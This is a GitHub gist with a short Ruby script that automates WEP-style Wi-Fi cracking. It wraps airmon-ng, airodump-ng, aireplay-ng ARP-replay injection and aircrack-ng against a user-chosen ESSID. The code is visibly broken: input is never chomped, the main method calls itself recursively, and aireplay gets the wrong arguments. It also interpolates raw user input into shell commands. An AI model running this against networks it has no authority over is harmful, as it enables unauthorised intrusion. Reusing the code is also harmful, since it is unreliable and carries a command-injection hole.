Skip to content

Instantly share code, notes, and snippets.

@actsasbuffoon
Created June 4, 2010 00:45
Show Gist options
  • Save actsasbuffoon/424740 to your computer and use it in GitHub Desktop.
Save actsasbuffoon/424740 to your computer and use it in GitHub Desktop.
def aireplay(essid,iface)
system("aireplay-ng -3 -e #{essid} #{iface}")
end
def airmon(iface,channel)
system ("airmon-ng start #{iface} #{channel}")
end
def airodump(iface)
system("airodump-ng --ivs #{iface}")
end
def aircrack(path)
system("aircrack-ng #{path}")
end
def textandstuff
puts "Thank you for using my program to assist you in automated wireless penetration\n"
puts "enter the desired ESSID\n"
essid = gets
puts "enter the interface you desire to put into monitor mode\n"
iface = gets
puts " channel the AP is on?\n"
channel = gets
puts "will you use packets from a file for arpreplay? type \"yes\" or \"no\""
fileorlive = gets
if fileorlive == "yes"
#im working on this "if" in the irb
puts "enter the FULL path to the working directory where all the pertinent files will be generated\n"
path = gets
else puts "gotcha, live capture enabled!\n"
puts "for these next few parameters please input as a single string and if no extra options are\n desired simply press enter to bypass\n"
puts "input any extra options you wish to pass to aircrack\n"
crackopt = gets
puts "do the same as above except for airmon-ng\n"
airmonopt = gets
end
textandstuff
aireplay("#{essid} , #{iface}")
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment